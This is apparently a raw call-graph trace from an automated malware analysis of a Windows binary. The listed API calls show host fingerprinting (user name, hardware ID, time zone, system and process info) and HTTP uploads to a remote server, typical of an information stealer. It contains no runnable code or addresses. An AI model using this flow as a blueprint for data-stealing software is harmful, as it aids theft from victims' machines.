87950->87951 87952 4104e7 lstrcpyA 87951->87952 87953 411c75 GetSystemTime 87952->87953 87954 411c91 87953->87954 87955 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87954->87955 87956 411cc8 87955->87956 87956->86963 87959 4105e1 87957->87959 87958 410605 87958->86978 87959->87958 87960 4105f3 lstrcpyA lstrcatA 87959->87960 87960->87958 87962 410519 lstrcpyA 87961->87962 87963 401d07 87962->87963 87964 410519 lstrcpyA 87963->87964 87965 401d12 87964->87965 87966 410519 lstrcpyA 87965->87966 87967 401d1d 87966->87967 87968 410519 lstrcpyA 87967->87968 87969 401d34 87968->87969 87970 4169b6 87969->87970 87971 410549 2 API calls 87970->87971 87972 4169ec 87971->87972 87973 410549 2 API calls 87972->87973 87974 4169f9 87973->87974 87975 410549 2 API calls 87974->87975 87976 416a06 87975->87976 87977 4104e7 lstrcpyA 87976->87977 87978 416a13 87977->87978 87979 4104e7 lstrcpyA 87978->87979 87980 416a20 87979->87980 87981 4104e7 lstrcpyA 87980->87981 87982 416a2d 87981->87982 87983 4104e7 lstrcpyA 87982->87983 87984 416a3a 87983->87984 87985 4104e7 lstrcpyA 87984->87985 87986 416a47 87985->87986 87987 4104e7 lstrcpyA 87986->87987 88043 416a54 87987->88043 87990 4168c6 33 API calls 87990->88043 87991 416a98 StrCmpCA 87992 416af1 StrCmpCA 87991->87992 87991->88043 87993 416cd4 87992->87993 87992->88043 87996 41058d lstrcpyA 87993->87996 87997 416cdf 87996->87997 88000 4104e7 lstrcpyA 87997->88000 87998 410519 lstrcpyA 87998->88043 88001 416cec 88000->88001 88003 41058d lstrcpyA 88001->88003 88002 401cfd lstrcpyA 88002->88043 88034 416c2c 88003->88034 88004 4104e7 lstrcpyA 88005 416d0b 88004->88005 88007 41058d lstrcpyA 88005->88007 88006 416b51 StrCmpCA 88009 416baa StrCmpCA 88006->88009 88006->88043 88008 416d15 88007->88008 89272 416da2 88008->89272 88010 416bc0 StrCmpCA 88009->88010 88011 416ca3 88009->88011 88014 416c72 88010->88014 88015 416bd6 StrCmpCA 88010->88015 88013 41058d lstrcpyA 88011->88013 88018 416cae 88013->88018 88016 41058d lstrcpyA 88014->88016 88019 416be8 StrCmpCA 88015->88019 88020 416c3e 88015->88020 88021 416c7d 88016->88021 88023 4104e7 lstrcpyA 88018->88023 88024 416c0a 88019->88024 88025 416bfa Sleep 88019->88025 88022 41058d lstrcpyA 88020->88022 88027 4104e7 lstrcpyA 88021->88027 88028 416c49 88022->88028 88029 416cbb 88023->88029 88026 41058d lstrcpyA 88024->88026 88025->88043 88030 416c15 88026->88030 88031 416c8a 88027->88031 88032 4104e7 lstrcpyA 88028->88032 88033 41058d lstrcpyA 88029->88033 88035 4104e7 lstrcpyA 88030->88035 88037 41058d lstrcpyA 88031->88037 88038 416c56 88032->88038 88033->88034 88034->88004 88039 416c22 88035->88039 88036 41683e 28 API calls 88036->88043 88037->88034 88040 41058d lstrcpyA 88038->88040 88041 41058d lstrcpyA 88039->88041 88040->88034 88041->88034 88042 41058d lstrcpyA 88042->88043 88043->87990 88043->87991 88043->87992 88043->87998 88043->88002 88043->88006 88043->88009 88043->88036 88043->88042 89263 4029f8 88043->89263 89266 402a09 88043->89266 89269 402a1a 88043->89269 89279 402a2b lstrcpyA 88043->89279 89280 402a3c lstrcpyA 88043->89280 89281 402a4d lstrcpyA 88043->89281 88044 416d28 88044->86989 88046 41058d lstrcpyA 88045->88046 88047 418257 88046->88047 88048 41058d lstrcpyA 88047->88048 88049 418262 88048->88049 88050 41058d lstrcpyA 88049->88050 88051 41826d 88050->88051 88051->86993 88053 410529 88052->88053 88054 41053e 88053->88054 88055 410536 lstrcpyA 88053->88055 88054->87006 88055->88054 88057 4109e6 GetVolumeInformationA 88056->88057 88058 4109df 88056->88058 88059 410a4d 88057->88059 88058->88057 88059->88059 88060 410a62 GetProcessHeap HeapAlloc 88059->88060 88061 410a7d 88060->88061 88062 410a8c wsprintfA lstrcatA 88060->88062 88063 4104e7 lstrcpyA 88061->88063 89282 411684 GetCurrentHwProfileA 88062->89282 88065 410a85 88063->88065 88068 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 88065->88068 88066 410ac7 lstrlenA 89298 4123d5 lstrcpyA malloc strncpy 88066->89298 88070 410b2e 88068->88070 88069 410aea lstrcatA 88071 410b01 88069->88071 88070->87033 88072 4104e7 lstrcpyA 88071->88072 88073 410b18 88072->88073 88073->88065 88075 410519 lstrcpyA 88074->88075 88076 404b59 88075->88076 89302 404ab6 88076->89302 88078 404b65 88079 4104e7 lstrcpyA 88078->88079 88080 404b81 88079->88080 88081 4104e7 lstrcpyA 88080->88081 88082 404b91 88081->88082 88083 4104e7 lstrcpyA 88082->88083 88084 404ba1 88083->88084 88085 4104e7 lstrcpyA 88084->88085 88086 404bb1 88085->88086 88087 4104e7 lstrcpyA 88086->88087 88088 404bc1 InternetOpenA StrCmpCA 88087->88088 88089 404bf5 88088->88089 88090 405194 InternetCloseHandle 88089->88090 88091 411c4a 7 API calls 88089->88091 88101 4051e1 88090->88101 88092 404c15 88091->88092 88093 4105c7 2 API calls 88092->88093 88094 404c28 88093->88094 88095 41058d lstrcpyA 88094->88095 88096 404c33 88095->88096 88097 410609 3 API calls 88096->88097 88098 404c5f 88097->88098 88099 41058d lstrcpyA 88098->88099 88100 404c6a 88099->88100 88102 410609 3 API calls 88100->88102 88103 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 88101->88103 88104 404c8b 88102->88104 88105 405235 88103->88105 88106 41058d lstrcpyA 88104->88106 88207 4139c2 StrCmpCA 88105->88207 88107 404c96 88106->88107 88108 4105c7 2 API calls 88107->88108 88109 404cb8 88108->88109 88110 41058d lstrcpyA 88109->88110 88111 404cc3 88110->88111 88112 410609 3 API calls 88111->88112 88113 404ce4 88112->88113 88114 41058d lstrcpyA 88113->88114 88115 404cef 88114->88115 88116 410609 3 API calls 88115->88116 88117 404d10 88116->88117 88118 41058d lstrcpyA 88117->88118 88119 404d1b 88118->88119 88120 410609 3 API calls 88119->88120 88121 404d3d 88120->88121 88122 4105c7 2 API calls 88121->88122 88123 404d48 88122->88123 88124 41058d lstrcpyA 88123->88124 88125 404d53 88124->88125 88126 404d69 InternetConnectA 88125->88126 88126->88090 88127 404d97 HttpOpenRequestA 88126->88127 88128 404dd7 88127->88128 88129 405188 InternetCloseHandle 88127->88129 88130 404dfb 88128->88130 88131 404ddf InternetSetOptionA 88128->88131 88129->88090 88132 410609 3 API calls 88130->88132 88131->88130 88133 404e11 88132->88133 88134 41058d lstrcpyA 88133->88134 88135 404e1c 88134->88135 88136 4105c7 2 API calls 88135->88136 88137 404e3e 88136->88137 88138 41058d lstrcpyA 88137->88138 88139 404e49 88138->88139 88140 410609 3 API calls 88139->88140 88141 404e6a 88140->88141 88142 41058d lstrcpyA 88141->88142 88143 404e75 88142->88143 88144 410609 3 API calls 88143->88144 88145 404e97 88144->88145 88146 41058d lstrcpyA 88145->88146 88147 404ea2 88146->88147 88148 410609 3 API calls 88147->88148 88149 404ec3 88148->88149 88150 41058d lstrcpyA 88149->88150 88151 404ece 88150->88151 88152 410609 3 API calls 88151->88152 88153 404eef 88152->88153 88154 41058d lstrcpyA 88153->88154 88155 404efa 88154->88155 88156 4105c7 2 API calls 88155->88156 88157 404f19 88156->88157 88158 41058d lstrcpyA 88157->88158 88159 404f24 88158->88159 88160 410609 3 API calls 88159->88160 88161 404f45 88160->88161 88162 41058d lstrcpyA 88161->88162 88163 404f50 88162->88163 88164 410609 3 API calls 88163->88164 88165 404f71 88164->88165 88166 41058d lstrcpyA 88165->88166 88167 404f7c 88166->88167 88168 4105c7 2 API calls 88167->88168 88169 404f9e 88168->88169 88170 41058d lstrcpyA 88169->88170 88171 404fa9 88170->88171 88172 410609 3 API calls 88171->88172 88173 404fca 88172->88173 88174 41058d lstrcpyA 88173->88174 88175 404fd5 88174->88175 88176 410609 3 API calls 88175->88176 88177 404ff7 88176->88177 88178 41058d lstrcpyA 88177->88178 88179 405002 88178->88179 88180 410609 3 API calls 88179->88180 88181 405023 88180->88181 88182 41058d lstrcpyA 88181->88182 88183 40502e 88182->88183 88184 410609 3 API calls 88183->88184 88185 40504f 88184->88185 88186 41058d lstrcpyA 88185->88186 88187 40505a 88186->88187 88188 4105c7 2 API calls 88187->88188 88189 405079 88188->88189 88190 41058d lstrcpyA 88189->88190 88191 405084 88190->88191 88192 4104e7 lstrcpyA 88191->88192 88193 40509f 88192->88193 88194 4105c7 2 API calls 88193->88194 88195 4050b6 88194->88195 88196 4105c7 2 API calls 88195->88196 88197 4050c7 88196->88197 88198 41058d lstrcpyA 88197->88198 88199 4050d2 88198->88199 88200 4050e8 lstrlenA lstrlenA HttpSendRequestA 88199->88200 88201 40515c InternetReadFile 88200->88201 88202 405176 InternetCloseHandle 88201->88202 88205 40511c 88201->88205 88203 402920 88202->88203 88203->88129 88204 410609 3 API calls 88204->88205 88205->88201 88205->88202 88205->88204 88206 41058d lstrcpyA 88205->88206 88206->88205 88208 4139e1 ExitProcess 88207->88208 88209 4139e8 strtok_s 88207->88209 88210 413a04 88209->88210 88212 413b48 88209->88212 88211 413b2a strtok_s 88210->88211 88213 413a21 StrCmpCA 88210->88213 88214 413a75 StrCmpCA 88210->88214 88215 413ab4 StrCmpCA 88210->88215 88216 413af4 StrCmpCA 88210->88216 88217 413b16 StrCmpCA 88210->88217 88218 413a59 StrCmpCA 88210->88218 88219 413ac9 StrCmpCA 88210->88219 88220 413a3d StrCmpCA 88210->88220 88221 413a9f StrCmpCA 88210->88221 88222 413ade StrCmpCA 88210->88222 88223 410549 2 API calls 88210->88223 88211->88210 88211->88212 88212->87041 88213->88210 88213->88211 88214->88210 88214->88211 88215->88210 88215->88211 88216->88211 88217->88211 88218->88210 88218->88211 88219->88210 88219->88211 88220->88210 88220->88211 88221->88210 88221->88211 88222->88211 88223->88210 88225 410519 lstrcpyA 88224->88225 88226 405f64 88225->88226 88227 404ab6 5 API calls 88226->88227 88228 405f70 88227->88228 88229 4104e7 lstrcpyA 88228->88229 88230 405f8c 88229->88230 88231 4104e7 lstrcpyA 88230->88231 88232 405f9c 88231->88232 88233 4104e7 lstrcpyA 88232->88233 88234 405fac 88233->88234 88235 4104e7 lstrcpyA 88234->88235 88236 405fbc 88235->88236 88237 4104e7 lstrcpyA 88236->88237 88238 405fcc InternetOpenA StrCmpCA 88237->88238 88239 406000 88238->88239 88240 4066ff InternetCloseHandle 88239->88240 88242 411c4a 7 API calls 88239->88242 89308 408048 CryptStringToBinaryA 88240->89308 88243 406020 88242->88243 88245 4105c7 2 API calls 88243->88245 88246 406033 88245->88246 88249 41058d lstrcpyA 88246->88249 88247 410549 2 API calls 88248 406739 88247->88248 88250 410609 3 API calls 88248->88250 88253 40603e 88249->88253 88251 406750 88250->88251 88252 41058d lstrcpyA 88251->88252 88258 40675b 88252->88258 88254 410609 3 API calls 88253->88254 88255 40606a 88254->88255 88256 41058d lstrcpyA 88255->88256 88257 406075 88256->88257 88261 410609 3 API calls 88257->88261 88259 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 88258->88259 88260 4067eb 88259->88260 88391 41343f strtok_s 88260->88391 88262 406096 88261->88262 88263 41058d lstrcpyA 88262->88263 88264 4060a1 88263->88264 88265 4105c7 2 API calls 88264->88265 88266 4060c3 88265->88266 88267 41058d lstrcpyA 88266->88267 88268 4060ce 88267->88268 88269 410609 3 API calls 88268->88269 88270 4060ef 88269->88270 88271 41058d lstrcpyA 88270->88271 88272 4060fa 88271->88272 88273 410609 3 API calls 88272->88273 88274 40611b 88273->88274 88275 41058d lstrcpyA 88274->88275 88276 406126 88275->88276 88277 410609 3 API calls 88276->88277 88278 406148 88277->88278 88279 4105c7 2 API calls 88278->88279 88280 406153 88279->88280 88281 41058d lstrcpyA 88280->88281 88282 40615e 88281->88282 88283 406174 InternetConnectA 88282->88283 88283->88240 88284 4061a2 HttpOpenRequestA 88283->88284 88285 4061e2 88284->88285 88286 4066f3 InternetCloseHandle 88284->88286 88287 406206 88285->88287 88288 4061ea InternetSetOptionA 88285->88288 88286->88240 88289 410609 3 API calls 88287->88289 88288->88287 88290 40621c 88289->88290 88291 41058d lstrcpyA 88290->88291 88292 406227 88291->88292 88293 4105c7 2 API calls 88292->88293 88294 406249 88293->88294 88295 41058d lstrcpyA 88294->88295 88296 406254 88295->88296 88297 410609 3 API calls 88296->88297 88298 406275 88297->88298 88299 41058d lstrcpyA 88298->88299 88300 406280 88299->88300 88301 410609 3 API calls 88300->88301 88302 4062a2 88301->88302 88303 41058d lstrcpyA 88302->88303 88304 4062ad 88303->88304 88305 410609 3 API calls 88304->88305 88306 4062cf 88305->88306 88307 41058d lstrcpyA 88306->88307 88308 4062da 88307->88308 88309 410609 3 API calls 88308->88309 88310 4062fb 88309->88310 88311 41058d lstrcpyA 88310->88311 88312 406306 88311->88312 88313 4105c7 2 API calls 88312->88313 88314 406325 88313->88314 88315 41058d lstrcpyA 88314->88315 88316 406330 88315->88316 88317 410609 3 API calls 88316->88317 88318 406351 88317->88318 88319 41058d lstrcpyA 88318->88319 88320 40635c 88319->88320 88321 410609 3 API calls 88320->88321 88322 40637d 88321->88322 88323 41058d lstrcpyA 88322->88323 88324 406388 88323->88324 88325 4105c7 2 API calls 88324->88325 88326 4063aa 88325->88326 88327 41058d lstrcpyA 88326->88327 88328 4063b5 88327->88328 88329 410609 3 API calls 88328->88329 88330 4063d6 88329->88330 88331 41058d lstrcpyA 88330->88331 88332 4063e1 88331->88332 88333 410609 3 API calls 88332->88333 88334 406403 88333->88334 88335 41058d lstrcpyA 88334->88335 88336 40640e 88335->88336 88337 410609 3 API calls 88336->88337 88338 40642f 88337->88338 88339 41058d lstrcpyA 88338->88339 88340 40643a 88339->88340 88341 410609 3 API calls 88340->88341 88342 40645b 88341->88342 88343 41058d lstrcpyA 88342->88343 88344 406466 88343->88344 88345 410609 3 API calls 88344->88345 88346 406487 88345->88346 88347 41058d lstrcpyA 88346->88347 88348 406492 88347->88348 88349 410609 3 API calls 88348->88349 88350 4064b3 88349->88350 88351 41058d lstrcpyA 88350->88351 88352 4064be 88351->88352 88353 410609 3 API calls 88352->88353 88354 4064df 88353->88354 88355 41058d lstrcpyA 88354->88355 88356 4064ea 88355->88356 88357 4105c7 2 API calls 88356->88357 88358 406506 88357->88358 88359 41058d lstrcpyA 88358->88359 88360 406511 88359->88360 88361 410609 3 API calls 88360->88361 88362 406532 88361->88362 88363 41058d lstrcpyA 88362->88363 88364 40653d 88363->88364 88365 410609 3 API calls 88364->88365 88366 40655f 88365->88366 88367 41058d lstrcpyA 88366->88367 88368 40656a 88367->88368 88369 410609 3 API calls 88368->88369 88370 40658b 88369->88370 88371 41058d lstrcpyA 88370->88371 88372 406596 88371->88372 88373 410609 3 API calls 88372->88373 88374 4065b7 88373->88374 88375 41058d lstrcpyA 88374->88375 88376 4065c2 88375->88376 88377 4105c7 2 API calls 88376->88377 88378 4065e1 88377->88378 88379 41058d lstrcpyA 88378->88379 88380 4065ec 88379->88380 88381 4065f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 88380->88381 89306 427050 88381->89306 88384 427050 _memmove 88385 406667 lstrlenA HttpSendRequestA 88384->88385 88386 4066d2 InternetReadFile 88385->88386 88387 4066ec InternetCloseHandle 88386->88387 88389 406692 88386->88389 88387->88286 88388 410609 3 API calls 88388->88389 88389->88386 88389->88387 88389->88388 88390 41058d lstrcpyA 88389->88390 88390->88389 88392 41346e 88391->88392 88393 4134cc 88391->88393 88394 4134b6 strtok_s 88392->88394 88395 410549 2 API calls 88392->88395 88396 410549 2 API calls 88392->88396 88393->87056 88394->88392 88394->88393 88395->88394 88396->88392 88400 413286 88397->88400 88398 413385 88398->87069 88399 413332 StrCmpCA 88399->88400 88400->88398 88400->88399 88401 410549 2 API calls 88400->88401 88402 413367 strtok_s 88400->88402 88403 413301 StrCmpCA 88400->88403 88404 4132dc StrCmpCA 88400->88404 88405 4132ab StrCmpCA 88400->88405 88401->88400 88402->88400 88403->88400 88404->88400 88405->88400 88407 413434 88406->88407 88409 4133bc 88406->88409 88407->87082 88408 4133e2 StrCmpCA 88408->88409 88409->88408 88410 410549 2 API calls 88409->88410 88411 41341a strtok_s 88409->88411 88412 410549 2 API calls 88409->88412 88410->88411 88411->88407 88411->88409 88412->88409 88414 4104e7 lstrcpyA 88413->88414 88415 413b9f 88414->88415 88416 410609 3 API calls 88415->88416 88417 413baf 88416->88417 88418 41058d lstrcpyA 88417->88418 88419 413bb7 88418->88419 88420 410609 3 API calls 88419->88420 88421 413bcf 88420->88421 88422 41058d lstrcpyA 88421->88422 88423 413bd7 88422->88423 88424 410609 3 API calls 88423->88424 88425 413bef 88424->88425 88426 41058d lstrcpyA 88425->88426 88427 413bf7 88426->88427 88428 410609 3 API calls 88427->88428 88429 413c0f 88428->88429 88430 41058d lstrcpyA 88429->88430 88431 413c17 88430->88431 88432 410609 3 API calls 88431->88432 88433 413c2f 88432->88433 88434 41058d lstrcpyA 88433->88434 88435 413c37 88434->88435 89313 410cc0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 88435->89313 88438 410609 3 API calls 88439 413c50 88438->88439 88440 41058d lstrcpyA 88439->88440 88441 413c58 88440->88441 88442 410609 3 API calls 88441->88442 88443 413c70 88442->88443 88444 41058d lstrcpyA 88443->88444 88445 413c78 88444->88445 88446 410609 3 API calls 88445->88446 88447 413c90 88446->88447 88448 41058d lstrcpyA 88447->88448 88449 413c98 88448->88449 89316 4115d4 88449->89316 88452 410609 3 API calls 88453 413cb1 88452->88453 88454 41058d lstrcpyA 88453->88454 88455 413cb9 88454->88455 88456 410609 3 API calls 88455->88456 88457 413cd1 88456->88457 88458 41058d lstrcpyA 88457->88458 88459 413cd9 88458->88459 88460 410609 3 API calls 88459->88460 88461 413cf1 88460->88461 88462 41058d lstrcpyA 88461->88462 88463 413cf9 88462->88463 88464 411684 11 API calls 88463->88464 88465 413d09 88464->88465 88466 4105c7 2 API calls 88465->88466 88467 413d16 88466->88467 88468 41058d lstrcpyA 88467->88468 88469 413d1e 88468->88469 88470 410609 3 API calls 88469->88470 88471 413d3e 88470->88471 88472 41058d lstrcpyA 88471->88472 88473 413d46 88472->88473 88474 410609 3 API calls 88473->88474 88475 413d5e 88474->88475 88476 41058d lstrcpyA 88475->88476 88477 413d66 88476->88477 88478 4109a2 19 API calls 88477->88478 88479 413d76 88478->88479 88480 4105c7 2 API calls 88479->88480 88481 413d83 88480->88481 88482 41058d lstrcpyA 88481->88482 88483 413d8b 88482->88483 88484 410609 3 API calls 88483->88484 88485 413dab 88484->88485 88486 41058d lstrcpyA 88485->88486 88487 413db3 88486->88487 88488 410609 3 API calls 88487->88488 88489 413dcb 88488->88489 88490 41058d lstrcpyA 88489->88490 88491 413dd3 88490->88491 88492 413ddb GetCurrentProcessId 88491->88492 89324 41224a OpenProcess 88492->89324 88495 4105c7 2 API calls 88496 413df8 88495->88496 88497 41058d lstrcpyA 88496->88497 88498 413e00 88497->88498 88499 410609 3 API calls 88498->88499 88500 413e20 88499->88500 88501 41058d lstrcpyA 88500->88501 88502 413e28 88501->88502 88503 410609 3 API calls 88502->88503 88504 413e40 88503->88504 88505 41058d lstrcpyA 88504->88505 88506 413e48 88505->88506 88507 410609 3 API calls 88506->88507 88508 413e60 88507->88508 88509 41058d lstrcpyA 88508->88509 88510 413e68 88509->88510 88511 410609 3 API calls 88510->88511 88512 413e80 88511->88512 88513 41058d lstrcpyA 88512->88513 88514 413e88 88513->88514 89331 410b30 GetProcessHeap HeapAlloc 88514->89331 88517 410609 3 API calls 88518 413ea1 88517->88518 88519 41058d lstrcpyA 88518->88519 88520 413ea9 88519->88520 88521 410609 3 API calls 88520->88521 88522 413ec1 88521->88522 88523 41058d lstrcpyA 88522->88523 88524 413ec9 88523->88524 88525 410609 3 API calls 88524->88525 88526 413ee1 88525->88526 88527 41058d lstrcpyA 88526->88527 88528 413ee9 88527->88528 89337 411807 88528->89337 88531 4105c7 2 API calls 88532 413f06 88531->88532 88533 41058d lstrcpyA 88532->88533 88534 413f0e 88533->88534 88535 410609 3 API calls 88534->88535 88536 413f2e 88535->88536 88537 41058d lstrcpyA 88536->88537 88538 413f36 88537->88538 88539 410609 3 API calls 88538->88539 88540 413f4e 88539->88540 88541 41058d lstrcpyA 88540->88541 88542 413f56 88541->88542 89354 411997 88542->89354 88544 413f67 88545 4105c7 2 API calls 88544->88545 88546 413f75 88545->88546 88547 41058d lstrcpyA 88546->88547 88548 413f7d 88547->88548 88549 410609 3 API calls 88548->88549 88550 413f9d 88549->88550 88551 41058d lstrcpyA 88550->88551 88552 413fa5 88551->88552 88553 410609 3 API calls 88552->88553 88554 413fbd 88553->88554 88555 41058d lstrcpyA 88554->88555 88556 413fc5 88555->88556 88557 410c85 3 API calls 88556->88557 88558 413fd2 88557->88558 88559 410609 3 API calls 88558->88559 88560 413fde 88559->88560 88561 41058d lstrcpyA 88560->88561 88562 413fe6 88561->88562 88563 410609 3 API calls 88562->88563 88564 413ffe 88563->88564 88565 41058d lstrcpyA 88564->88565 88566 414006 88565->88566 88567 410609 3 API calls 88566->88567 88568 41401e 88567->88568 88569 41058d lstrcpyA 88568->88569 88570 414026 88569->88570 89369 410c53 GetProcessHeap HeapAlloc GetUserNameA 88570->89369 88572 414033 88573 410609 3 API calls 88572->88573 88574 41403f 88573->88574 88575 41058d lstrcpyA 88574->88575 88576 414047 88575->88576 88577 410609 3 API calls 88576->88577 88578 41405f 88577->88578 88579 41058d lstrcpyA 88578->88579 88580 414067 88579->88580 88581 410609 3 API calls 88580->88581 88582 41407f 88581->88582 88583 41058d lstrcpyA 88582->88583 88584 414087 88583->88584 89370 411563 7 API calls 88584->89370 88587 4105c7 2 API calls 88588 4140a6 88587->88588 88589 41058d lstrcpyA 88588->88589 88590 4140ae 88589->88590 88591 410609 3 API calls 88590->88591 88592 4140ce 88591->88592 88593 41058d lstrcpyA 88592->88593 88594 4140d6 88593->88594 88595 410609 3 API calls 88594->88595 88596 4140ee 88595->88596 88597 41058d lstrcpyA 88596->88597 88598 4140f6 88597->88598 89373 410ddb 88598->89373 88601 4105c7 2 API calls 88602 414113 88601->88602 88603 41058d lstrcpyA 88602->88603 88604 41411b 88603->88604 88605 410609 3 API calls 88604->88605 88606 41413b 88605->88606 88607 41058d lstrcpyA 88606->88607 88608 414143 88607->88608 88609 410609 3 API calls 88608->88609 88610 41415b 88609->88610 88611 41058d lstrcpyA 88610->88611 88612 414163 88611->88612 88613 410cc0 9 API calls 88612->88613 88614 414170 88613->88614 88615 410609 3 API calls 88614->88615 88616 41417c 88615->88616 88617 41058d lstrcpyA 88616->88617 88618 414184 88617->88618 88619 410609 3 API calls 88618->88619 88620 41419c 88619->88620 88621 41058d lstrcpyA 88620->88621 88622 4141a4 88621->88622 88623 410609 3 API calls 88622->88623 88624 4141bc 88623->88624 88625 41058d lstrcpyA 88624->88625 88626 4141c4 88625->88626 89385 410d2e GetProcessHeap HeapAlloc GetTimeZoneInformation 88626->89385 88629 410609 3 API calls 88630 4141dd 88629->88630 88631 41058d lstrcpyA 88630->88631 88632 4141e5 88631->88632 88633 410609 3 API calls 88632->88633 88634 4141fd 88633->88634 88635 41058d lstrcpyA 88634->88635 88636 414205 88635->88636 88637 410609 3 API calls 88636->88637 88638 41421d 88637->88638 88639 41058d lstrcpyA 88638->88639 88640 414225 88639->88640 88641 410609 3 API calls 88640->88641 88642 41423d 88641->88642 88643 41058d lstrcpyA 88642->88643 88644 414245 88643->88644 89390 410f51 GetProcessHeap HeapAlloc RegOpenKeyExA 88644->89390 88647 410609 3 API calls 88648 41425e 88647->88648 88649 41058d lstrcpyA 88648->88649 88650 414266 88649->88650 88651 410609 3 API calls 88650->88651 88652 41427e 88651->88652 88653 41058d lstrcpyA 88652->88653 88654 414286 88653->88654 88655 410609 3 API calls 88654->88655 88656 41429e 88655->88656 88657 41058d lstrcpyA 88656->88657 88658 4142a6 88657->88658 89393 411007 88658->89393 88661 410609 3 API calls 88662 4142bf 88661->88662 88663 41058d lstrcpyA 88662->88663 88664 4142c7 88663->88664 88665 410609 3 API calls 88664->88665 88666 4142df 88665->88666 88667 41058d lstrcpyA 88666->88667 88668 4142e7 88667->88668 88669 410609 3 API calls 88668->88669 88670 4142ff 88669->88670 88671 41058d lstrcpyA 88670->88671 88672 414307 88671->88672 89410 410fba GetSystemInfo wsprintfA 88672->89410 88675 410609 3 API calls 88676 414320 88675->88676 88677 41058d lstrcpyA 88676->88677 88678 414328 88677->88678 88679 410609 3 API calls 88678->88679 88680 414340 88679->88680 88681 41058d lstrcpyA 88680->88681 88682 414348 88681->88682 88683 410609 3 API calls 88682->88683 88684 414360 88683->88684 88685 41058d lstrcpyA 88684->88685 88686 414368 88685->88686 89413 411119 GetProcessHeap HeapAlloc 88686->89413 88689 410609 3 API calls 88690 414381 88689->88690 88691 41058d lstrcpyA 88690->88691 88692 414389 88691->88692 88693 410609 3 API calls 88692->88693 88694 4143a4 88693->88694 88695 41058d lstrcpyA 88694->88695 88696 4143ac 88695->88696 88697 410609 3 API calls 88696->88697 88698 4143c7 88697->88698 88699 41058d lstrcpyA 88698->88699 88700 4143cf 88699->88700 89420 411192 88700->89420 88703 4105c7 2 API calls 88704 4143ef 88703->88704 88705 41058d lstrcpyA 88704->88705 88706 4143f7 88705->88706 88707 410609 3 API calls 88706->88707 88708 41441a 88707->88708 88709 41058d lstrcpyA 88708->88709 88710 414422 88709->88710 88711 410609 3 API calls 88710->88711 88712 41443a 88711->88712 88713 41058d lstrcpyA 88712->88713 88714 414442 88713->88714 89428 4114a5 88714->89428 88717 4105c7 2 API calls 88718 414462 88717->88718 88719 41058d lstrcpyA 88718->88719 88720 41446a 88719->88720 88721 410609 3 API calls 88720->88721 88722 414490 88721->88722 88723 41058d lstrcpyA 88722->88723 88724 414498 88723->88724 88725 410609 3 API calls 88724->88725 88726 4144b3 88725->88726 88727 41058d lstrcpyA 88726->88727 88728 4144bb 88727->88728 89438 411203 88728->89438 88731 4105c7 2 API calls 88732 4144e0 88731->88732 88733 41058d lstrcpyA 88732->88733 88734 4144e8 88733->88734 88735 411203 18 API calls 88734->88735 88736 414509 88735->88736 88737 4105c7 2 API calls 88736->88737 88738 414518 88737->88738 88739 41058d lstrcpyA 88738->88739 88740 414520 88739->88740 88741 410609 3 API calls 88740->88741 88742 414543 88741->88742 88743 41058d lstrcpyA 88742->88743 88744 41454b 88743->88744 88745 401cfd lstrcpyA 88744->88745 88746 414560 lstrlenA 88745->88746 88747 4104e7 lstrcpyA 88746->88747 88748 41457d 88747->88748 89454 416e97 88748->89454 89259->87942 89261 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89260->89261 89262 412601 89261->89262 89262->87162 89262->87169 89264 4104e7 lstrcpyA 89263->89264 89265 402a05 89264->89265 89265->88043 89267 4104e7 lstrcpyA 89266->89267 89268 402a16 89267->89268 89268->88043 89270 4104e7 lstrcpyA 89269->89270 89271 402a27 89270->89271 89271->88043 89273 410519 lstrcpyA 89272->89273 89274 416dac 89273->89274 89275 410519 lstrcpyA 89274->89275 89276 416db7 89275->89276 89277 410519 lstrcpyA 89276->89277 89278 416dc2 89277->89278 89278->88044 89279->88043 89280->88043 89281->88043 89283 4116ad 89282->89283 89284 41173c 89282->89284 89286 4104e7 lstrcpyA 89283->89286 89285 4104e7 lstrcpyA 89284->89285 89287 411748 89285->89287 89288 4116c0 _memset 89286->89288 89289 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89287->89289 89299 4123d5 lstrcpyA malloc strncpy 89288->89299 89290 411755 89289->89290 89290->88066 89292 4116ea lstrcatA 89300 402920 89292->89300 89294 411707 lstrcatA 89295 411724 89294->89295 89296 4104e7 lstrcpyA 89295->89296 89297 411732 89296->89297 89297->89287 89298->88069 89299->89292 89301 402924 89300->89301 89301->89294 89303 404ac4 89302->89303 89303->89303 89304 404acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 89303->89304 89305 404b27 89304->89305 89305->88078 89307 40663e lstrlenA lstrlenA 89306->89307 89307->88384 89309 40806a LocalAlloc 89308->89309 89310 406724 89308->89310 89309->89310 89311 40807a CryptStringToBinaryA 89309->89311 89310->88247 89310->88258 89311->89310 89312 408091 LocalFree 89311->89312 89312->89310 89314 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89313->89314 89315 410d2c 89314->89315 89315->88438 89471 423c10 89316->89471 89319 411651 CharToOemA 89322 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89319->89322 89320 411630 RegQueryValueExA 89320->89319 89323 411682 89322->89323 89323->88452 89325 412294 89324->89325 89326 412278 K32GetModuleFileNameExA CloseHandle 89324->89326 89327 4104e7 lstrcpyA 89325->89327 89326->89325 89328 4122a0 89327->89328 89329 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89328->89329 89330 4122ae 89329->89330 89330->88495 89473 410c16 89331->89473 89334 410b63 RegOpenKeyExA 89335 410b83 RegQueryValueExA 89334->89335 89336 410b5c 89334->89336 